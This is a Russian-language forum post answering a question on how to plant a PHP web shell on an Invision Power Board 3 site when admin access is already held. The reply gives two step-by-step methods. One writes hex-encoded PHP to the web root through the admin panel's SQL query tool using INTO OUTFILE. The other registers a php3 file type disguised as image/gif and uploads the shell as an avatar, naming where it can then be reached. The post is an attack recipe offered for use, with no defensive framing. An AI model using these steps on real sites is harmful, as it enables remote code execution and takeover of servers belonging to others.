Сообщение от
NeKit
Как можно загрузить шелл на IPB 3? Имеется доступ в админку. Способы IPB 2 к несчастью использовать не получается.
можно так попробовать:
вариант1:
Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос
select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'
полный путь можно посмотреть так:
->Поддержка, там будет сверху написана версия PHP и слева ссылка на
PHP INFO
Тестилось на IBP 3.0.1 nulled
шелл: http://site.ru/uploads/shell.php
PS: Нужны соответствующие права
вариант2:
Форумы->Прикрепляемые файлы->Типы файлов
жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - image/gif->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.
Топаем в свой профиль:
http://site.ru/index.php?app=core&module=usercp&tab=members&area= avatar
грузим аву-шелл с расширением php3 и получаем шелл по адресу:
http://site.ru/uploads/av-1.php3